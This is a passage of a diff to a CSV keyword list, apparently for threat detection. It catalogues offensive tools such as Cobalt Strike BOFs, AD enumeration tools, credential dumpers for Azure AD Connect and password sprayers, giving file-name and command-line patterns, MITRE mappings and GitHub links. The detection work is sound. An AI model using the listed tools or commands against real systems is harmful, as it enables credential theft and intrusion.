T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Add-ServiceDacl *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Add-ServiceDacl*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*addspn.py -u * -p * -t * -s * --additional *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*addspn.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*addspn.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*AddUser-Bof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" 
@@ -7062,39 +7206,39 @@ "*adfind.exe -gcb -sc trustdmp > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*","offensive_tool_keyword","POC","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ADFSDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADFSDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ADFSpoof.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ADFSpoof-master*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" 
-"*ADFSpray.csv*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" -"*adfspray.git*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" -"*ADFSpray.py*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*ADFSpray.csv*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*adfspray.git*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*ADFSpray.py*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" 
"*ADHunt-main.zip*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*adidnsdump -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*adidnsdump*","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","8","772","105","2023-06-20T07:49:31Z","2019-04-24T17:18:46Z" "*ad-ldap-enum.py*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*ad-ldap-enum-main*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" 
-"*adm|admin|root|sudo|wheel*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*admin.kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*adm|admin|root|sudo|wheel*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*admin.kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*Admin2Sys.exe*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*Admin2Sys-main*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*Adminisme/ServerScan/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*adobe_top100_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*adsearch* --domain-admins*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*adsearch.exe*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*ADSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*ADSearch.sln*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*ADSearch\ADSearch.cs*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*adsearch-master.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*ADSyncDecrypt.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*ADSyncGather.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect 
credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*ADSyncQuery*ADSync.mdf*.txt*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*Advanced-SQL-Injection-Cheatsheet*","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2239","568","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z" -"*advantech_iview_networkservlet_cmd_inject.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*adxcsouf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*adobe_top100_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*adsearch* --domain-admins*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*adsearch.exe*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*ADSearch.sln*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*ADSearch\ADSearch.cs*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*adsearch-master.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*ADSyncDecrypt.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z"
+"*ADSyncGather.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z"
+"*ADSyncQuery*ADSync.mdf*.txt*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z"
+"*Advanced-SQL-Injection-Cheatsheet*","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2242","569","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z"
+"*advantech_iview_networkservlet_cmd_inject.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*adxcsouf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
